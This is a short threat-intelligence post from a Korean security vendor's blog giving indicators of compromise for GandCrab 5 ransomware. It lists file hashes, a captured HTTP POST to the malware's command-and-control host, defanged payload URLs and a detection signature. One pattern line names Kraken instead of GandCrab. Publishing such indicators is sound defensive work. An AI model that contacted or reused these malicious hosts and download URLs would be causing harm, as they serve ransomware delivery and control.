Wins blog

Global information security partner! Global Security No.1: Wins is leaping from Korea's leading information security company to a global hidden champion.

Security Information

Malware Info: Win32/Ransomware.GandCrab 5
Posted 2018-10-26, Views 618

ㅁ Malware IoC

  Pattern:  Win32/Ransomware.Kraken 2.0.6
  Filename: -
  Type:     PE (exe)
  Size:     172,032 bytes
  MD5:      2d351d67eab01124b7189c02cff7595f

ㅁ Malware Traffic

POST /uploads/imgs/dadarufu.bmp HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.poketeg.com
Content-Length: 612
Cache-Control: no-cache

ㅁ Malware String

 - http://filestorage[.]biz/download.php?file=e541302686cca000584050d41e254261
 - http://memesmix[.]net/media/created/dd0doq[.]jpg

ㅁ Malware C2

 - www[.]poketeg[.]com/uploads/imgs/dadarufu.bmp

ㅁ Malware Hash

 - 64d341ecbc52f9d78080bf23559ec1778824979dd19498ee44032ec1d5224ff6

ㅁ Wins Sniper Pattern

 - [4462] Win32/Ransomware.GandCrab5.Generic

Source

https://www.virustotal.com/#/file/64d341ecbc52f9d78080bf23559ec1778824979dd19498ee44032ec1d5224ff6/detection

Attachments: none.
Tags: Malware Info, Ransomware, GandCrab